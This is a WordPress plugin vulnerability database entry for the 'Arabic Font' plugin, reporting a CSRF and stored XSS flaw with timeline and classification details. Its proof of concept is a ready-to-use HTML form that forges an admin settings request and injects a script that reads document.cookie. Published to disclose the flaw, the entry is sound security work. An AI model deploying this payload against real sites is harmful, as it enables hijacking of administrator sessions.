WordPress Plugin Vulnerabilities
Arabic Font - CSRF & Stored XSS
Description
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php"> <input type="hidden" name="save1" value="Save changes"> <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor"> <input type="hidden" name="AF_fontsize" value="18"> <input type="hidden" name="AF_lineheight" value="45"> <input type="hidden" name="AF_textalign" value="Center"> <input type="hidden" name="AF_defaultcssclass" value=".arab"><script>alert(document.cookie)</script><input+type="hidden"+value=""> <input type="hidden" name="AF_customcss" value=""> <input type="hidden" name="action" value="save"> <input type="submit" value="Drink all the booze, hack all the things."> </form>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
rastating
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-07-20 (about 6 years ago)
Added
2017-07-21 (about 6 years ago)
Last Updated
2019-11-01 (about 4 years ago)